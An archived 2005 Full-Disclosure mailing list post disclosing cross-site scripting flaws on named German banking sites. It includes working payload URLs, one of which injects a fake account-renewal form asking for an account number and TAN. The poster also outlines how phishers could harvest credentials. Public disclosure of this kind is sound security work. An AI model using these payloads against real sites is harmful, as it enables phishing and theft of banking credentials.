lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu Dec 22 20:02:37 2005 From: constantin.hofstetter at gmail.com (Constantin Hofstetter) Subject: CSS (Cross Site Scripting) on Germanys second largest financial institute's ebanking portal (Volksbank Raiffeisenbank) I emaild the Administrators 2 months ago - the only response I got was something like: "We will look into it, but we may or may not change anything on the page - who knows; we wont tell you!". I called them and the guy on the phone laughed at me. Here are the links / examples: *Original:* https://www.vr-ebanking.de/index.php?RZBK=0280 [vr-ebanking.de] *MY Version (CSS):* https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&Ini t Href=http://www.consti.de/secure<https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure>[ vr-ebanking.de] */F?lschung --> Imitation /* My local Banks Website: http://voba-lindenberg.de/content_suche.php?search=<b>Mysql_Injection?</b>'<http://voba-lindenberg.de/content_suche.php?search=%3Cdiv%20style=z-index:2000;position:absolute;margin-top:-52> The Institute that should secure the financial institute's websites: http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10 <http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView&query=AA%22%3E%3Cdiv%20style=z-index:2000;position:absolute;width:90%25;height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3ETAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=submit%20value=Aktivieren%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=%22&SearchMax=10> and so on.. The vr-ebanking site is used by millions of people each day for their daily financial stuff (ebanking) - someone (phisers) could easily use the CSS (Cross Site Scripting) to create real looking websites "within" the domain; More importantly they could create a website that does all the true login stuff (in the background) but sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql database full of working tans!). This is not looking to good for my bank, but they dont listen - -- Constantin Hofstetter http://www.consti.de Constantin.Hofstetter@...il.com mailmespam@...il.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051222/55343595/attachment.html